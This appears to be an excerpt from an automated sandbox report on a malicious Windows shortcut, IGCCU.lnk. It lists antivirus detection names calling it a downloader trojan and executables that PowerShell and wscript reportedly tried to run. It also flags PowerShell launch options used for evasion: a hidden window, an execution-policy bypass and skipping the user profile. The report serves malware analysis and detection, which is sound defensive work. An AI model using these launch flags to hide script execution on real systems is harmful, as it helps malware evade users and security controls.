option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

FireEye	Generic.BAT.Downloader.N.0677E2DD
ALYac	Heur.BZC.PZQ.Pantera.115.4BC0F345
VIPRE	Generic.BAT.Downloader.N.0677E2DD
ESET-NOD32	LNK/Downloader.A suspicious
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.Multi.GenBadur.genw
BitDefender	Generic.BAT.Downloader.N.0677E2DD
MicroWorld-eScan	Generic.BAT.Downloader.N.0677E2DD
F-Secure	Trojan-Downloader:W32/Kataja.C
Sophos	Troj/DownLnk-AW
SentinelOne	Static AI - Suspicious LNK
MAX	malware (ai score=85)
Arcabit	Generic.BAT.Downloader.N.0677E2DD [many]
ZoneAlarm	HEUR:Trojan.Multi.GenBadur.genw
GData	Heur.BZC.PZQ.Pantera.115.4BC0F345
Google	Detected
VBA32	Trojan.Link.ShellCmd
Zoner	Probably Heur.LNKScript
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
AVG	Other:Malware-gen [Trj]

The processes powershell.exe, wscript.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\util\curl\curl.exe
file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe

IGCCU.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All